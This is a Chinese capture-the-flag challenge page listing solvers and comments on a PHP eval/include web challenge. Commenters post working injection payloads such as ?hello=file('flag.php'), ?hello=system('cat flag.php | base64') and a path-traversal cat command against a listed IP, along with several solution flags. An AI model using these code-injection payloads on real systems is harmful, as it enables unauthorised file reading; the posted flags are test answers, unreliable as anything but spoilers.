评分(10)
解题动态
uiu 攻破了该题 8小时前
Rencj 攻破了该题 11小时前
无情的白给机器人 攻破了该题 12小时前
大奇 攻破了该题 13小时前
神逆流·神里绫华 攻破了该题 16小时前
小鱼板板 攻破了该题 16小时前
kiritoldws 攻破了该题 17小时前
chenzhong 攻破了该题 1天前
gusto. 攻破了该题 1天前
z2l1 攻破了该题 1天前
多斯Nico 攻破了该题 1天前
13522765614 攻破了该题 1天前
等往事风中吹‘ 攻破了该题 2天前
evilk 攻破了该题 2天前
kim66 攻破了该题 2天前
flag大王 攻破了该题 2天前
66744565 攻破了该题 2天前
3373441596 攻破了该题 2天前
pengyu 攻破了该题 2天前
评论
ryan777 2年前
举报
根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')
AmazingForself 2年前
举报
看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539
ryl123569 2年前
举报
?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}
xiaobaiermei 2年前
举报
这里应该算的上是个文件包含吧
17leaf 2年前
举报
flag{4ccf17345bf8d8b3c5a6d005cf17e00a}
cap 2年前
举报
为啥我这样不行 ?hello=system("cat flag.php")
Restwlaq 2年前
举报
因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')
你的宝 2年前
举报
http://114.67.175.224:15626/?hello=file(%27flag.php%27)
15056775319 2年前
举报
http://114.67.175.224:17077/?hello=system('cat../../../../../../../../flag')
dodobird 2年前
举报
flag{6138fe804a171cd4cbfc9ea7cf1d1cd4}
bigbox1 3年前
举报
`cat *` 或system("cat *")